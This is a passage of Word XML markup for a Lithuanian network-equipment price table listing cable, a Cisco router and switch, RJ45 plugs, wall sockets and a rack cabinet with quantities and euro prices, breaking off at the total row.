              <w:t>LANBERG LCU6-10CC-0305-S Lanberg UTP solid cable, CCA, cat. 6, 305m, gray</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4185A1A9" w14:textId="36A16332" w:rsidR="43766125" w:rsidRPr="005A5C28" w:rsidRDefault="43766125" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="707B999A" w14:textId="52F45E70" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="53E65988" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="5A84E86D"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2B00BD96" w14:textId="345A74D2" w:rsidR="5D260F88" w:rsidRPr="005A5C28" w:rsidRDefault="5D260F88" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Maršrutizatorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="71C8D324" w14:textId="59A8FAB6" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="3D43822D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CISCO ISR 1100 4 Ports Dual GE WAN Ethernet Router</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="32915D4B" w14:textId="7CE017A0" w:rsidR="5D260F88" w:rsidRPr="005A5C28" w:rsidRDefault="5D260F88" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="63093D4D" w14:textId="508E6E11" w:rsidR="3CF044AB" w:rsidRPr="005A5C28" w:rsidRDefault="3CF044AB" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="282196C6" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="7E615F65" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>00€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6CF9E40A"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610845F0" w14:textId="2F672F5C" w:rsidR="5D260F88" w:rsidRPr="005A5C28" w:rsidRDefault="5D260F88" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Komutatorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5CF32278" w14:textId="59A8FAB6" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="136C90CC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CISCO Catalyst 1000 24-Port Gigabit PoE+ PoE Budget 195W 4 x 1G SFP Uplinks LAN Base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46EC2D95" w14:textId="243C3639" w:rsidR="1702E30C" w:rsidRPr="005A5C28" w:rsidRDefault="1702E30C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="55D88DDF" w14:textId="7A7644CE" w:rsidR="1702E30C" w:rsidRPr="005A5C28" w:rsidRDefault="1702E30C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>673</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>00€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="62E8CC2C"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382C9B0D" w14:textId="59A8FAB6" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="765F0C37" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>RJ45 kištukas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="45600BDD" w14:textId="59A8FAB6" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="765F0C37" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Assmann modular plug cat. 6, universalus, 8p8c, 100 vnt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5450E79E" w14:textId="2E43AB51" w:rsidR="765F0C37" w:rsidRPr="005A5C28" w:rsidRDefault="765F0C37" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="41F95C0E" w14:textId="34F4E044" w:rsidR="765F0C37" w:rsidRPr="005A5C28" w:rsidRDefault="765F0C37" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidR="72876A06" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="579A0EFE"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474B15BB" w14:textId="1B8829B7" w:rsidR="72876A06" w:rsidRPr="005A5C28" w:rsidRDefault="72876A06" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>potinkinis lizdas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="07726037" w14:textId="59A8FAB6" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="663B7CB6" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Netrack potinkinis lizdas 2xRJ45 8p8c UTP Cat6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="714E918C" w14:textId="73728CFE" w:rsidR="72876A06" w:rsidRPr="005A5C28" w:rsidRDefault="72876A06" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="674A37DF" w14:textId="48CA2D0F" w:rsidR="72876A06" w:rsidRPr="005A5C28" w:rsidRDefault="72876A06" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>19€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3684A573"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1F6E4156" w14:textId="2A6D69FE" w:rsidR="05F234DD" w:rsidRPr="005A5C28" w:rsidRDefault="05F234DD" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Komutacinė spinta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="378CEA59" w14:textId="59A8FAB6" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="05F234DD" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>LANBERG WF10-2312-10B Lanberg Installation Cabinet Rack Hanger 10 12U 280X310 Black</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6787BBFA" w14:textId="14959F2A" w:rsidR="05F234DD" w:rsidRPr="005A5C28" w:rsidRDefault="05F234DD" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1BDA5B56" w14:textId="0C918B8E" w:rsidR="23E98CA7" w:rsidRPr="005A5C28" w:rsidRDefault="23E98CA7" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r w:rsidR="00037E6B" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>49 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="36F1F8F9" w14:textId="77777777" w:rsidTr="00037E6B">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1316" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="76C736D6" w14:textId="60628F4E" w:rsidR="72876A06" w:rsidRPr="005A5C28" w:rsidRDefault="72876A06" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>IŠ VISO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="10025A82" w14:textId="4FA0D45C" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="53E65988" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="492" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="77D2E7A2" w14:textId="44E53BB4" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="53E65988" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3C7CB5BF" w14:textId="59A8FAB6" w:rsidR="53E65988" w:rsidRPr="005A5C28" w:rsidRDefault="3E7D5974" w:rsidP="0089230F">
            <w:pPr>
